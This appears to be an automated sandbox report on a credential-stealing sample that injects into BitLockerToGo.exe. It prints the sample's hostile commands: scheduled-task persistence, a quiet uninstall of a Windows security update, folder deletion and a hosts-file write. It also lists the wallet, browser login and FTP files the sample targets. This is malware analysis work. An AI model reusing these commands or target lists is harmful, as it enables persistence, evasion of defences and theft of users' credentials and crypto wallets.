                        Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C54000
                        Source: C:\Users\user\Desktop\S0FTWARE.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\ProgramData\AAFIJKKEHJ.exe "C:\ProgramData\AAFIJKKEHJ.exe"
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\ProgramData\GHDAKKJJJK.exe "C:\ProgramData\GHDAKKJJJK.exe"
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCGHJEBGHJKE" & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\GHDAKKJJJK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Users\user\AppData\Roaming\service.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C754760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,3_2_6C754760
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C631C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,3_2_6C631C30
                        Source: S0FTWARE.exe, 00000000.00000002.2229780239.000000000107A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: maMIPS JMP AddrMIPS with FPUMapViewOfFileMasaram_GondiMende_KikakuiMethodOptionsMikrosekundenMillisekundenModifyChannelModifyWebhookModule32NextWNetIsHostnameNotCongruent;NotHumpEqual;NotLessEqual;NotLessTilde;NtQueryObjectOMAP From SrcOld_HungarianOleInitializeOpenClipboardOpenThemeDataPKCS1WithSHA1PartyModeTempPdhCloseQueryProportional;Quechua (quz)RISC-V Low 12RISC-V Low12sRate limited.ReadDBPointerReadTimestampReadUndefinedRegDeleteKeyWRegEnumKeyExWRegEnumValueWRegOpenKeyExWRelative pathReservedNamesReset ContentRightCeiling;Romanian (ro)RoundImplies;RoundingMode(RtlGetVersionRtlInitStringRtlMoveMemorySHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSSTREAM_CLOSEDSafeArrayCopySafeArrayLockSanskrit (sa)SetBrushOrgExSetScrollInfoSetWindowLongSetswana (tn)ShellExecuteWShell_TrayWndShortUpArrow;SquareSubset;StandAloneSigStartServiceWStringPatternStructEndBoolStructEndUintStructHeadIntStructHeadMapStructPtrHeadSwa hwaer swaSwa hw
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A0118E cpuid 3_2_02A0118E
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_02A12A37
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_02A2CAE8
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_02A2B2D0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_02A2CA41
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_02A2C3C0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_02A2CB43
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_02A2C94C
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_02A2CEA3
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_02A2CE00
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_02A2CE67
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_02A2A644
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoA,3_2_02A2FF24
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_02A26C63
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_02A2B5EE
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_02A2FDEF
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_02A28DF6
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: EnumSystemLocalesA,3_2_02A2CDD6
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_02A2CD14
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_02A28D1C
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\Desktop\S0FTWARE.exeQueries volume information: C:\Users\user\Desktop\S0FTWARE.exe VolumeInformation
                        Source: C:\Users\user\Desktop\S0FTWARE.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A138A6 GetSystemTime,3_2_02A138A6
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A128AF GetProcessHeap,RtlAllocateHeap,GetUserNameA,3_2_02A128AF
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A1298A GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,3_2_02A1298A
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C658390 NSS_GetVersion,3_2_6C658390
                        Source: C:\Users\user\Desktop\S0FTWARE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        Source: C:\ProgramData\AAFIJKKEHJ.exeFile written: C:\Windows\System32\drivers\etc\hosts
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        Source: Yara matchFile source: 3.2.BitLockerToGo.exe.2a00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138c6000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138bdec0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13880000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2190577336.00000000137EE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 744, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6152, type: MEMORYSTR
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 3.2.BitLockerToGo.exe.2a00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13556000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138c6000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13780000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.138bdec0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138bdec0.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.13880000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.S0FTWARE.exe.13880000.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.S0FTWARE.exe.138c6000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.BitLockerToGo.exe.2a3ecc0.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: S0FTWARE.exe PID: 744, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: BitLockerToGo.exe PID: 6152, type: MEMORYSTR
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: eed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: bitbucket.orglfons\AppData\Roaming\ElectronCash\wallets\*.**:&
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Roaming\Binance\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
